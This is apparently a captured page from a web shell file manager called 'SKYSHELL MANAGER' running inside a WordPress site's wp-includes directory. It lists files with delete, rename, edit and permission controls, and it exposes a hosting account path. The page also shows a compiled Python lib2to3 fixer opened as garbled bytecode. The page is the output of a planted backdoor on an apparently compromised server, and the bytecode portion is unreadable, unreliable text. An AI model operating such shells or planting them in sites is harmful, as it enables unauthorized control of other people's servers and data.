📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
8260.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: fix_ws_comma.cpython-312.opt-1.pyc
� �{|jB � �V � d Z ddlmZ ddlmZ ddlmZ G d� dej � Zy)z�Fixer that changes 'a ,b' into 'a, b'. This also changes '{a :b}' into '{a: b}', but does not touch other uses of colons. It does not touch other uses of whitespace. � )�pytree)�token)� fixer_basec � � e Zd ZdZdZ ej ej d� Z ej ej d� Z ee fZ d� Zy)� FixWsCommaTzH any<(not(',') any)+ ',' ((not(',') any)+ ',')* [not(',') any]> �,�:c �� � |j � }d}|j D ]S }|| j v r*|j }|j � rd|vrd|_ d}�;|r|j }|sd|_ d}�U |S )NF� � T� )�clone�children�SEPS�prefix�isspace)�self�node�results�new�comma�childr s �3/usr/lib64/python3.12/lib2to3/fixes/fix_ws_comma.py� transformzFixWsComma.transform st � ��j�j�l�����\�\�E��� � �!������>�>�#��F�(:�#%�E�L����"�\�\�F�!�'*����� "� � � N)�__name__� __module__�__qualname__�explicit�PATTERNr �Leafr �COMMA�COLONr r � r r r r sJ � ��H��G� �F�K�K����S�)�E��F�K�K����S�)�E��5�>�D�r r N)�__doc__r r �pgen2r r �BaseFixr r$ r r �<module>r( s'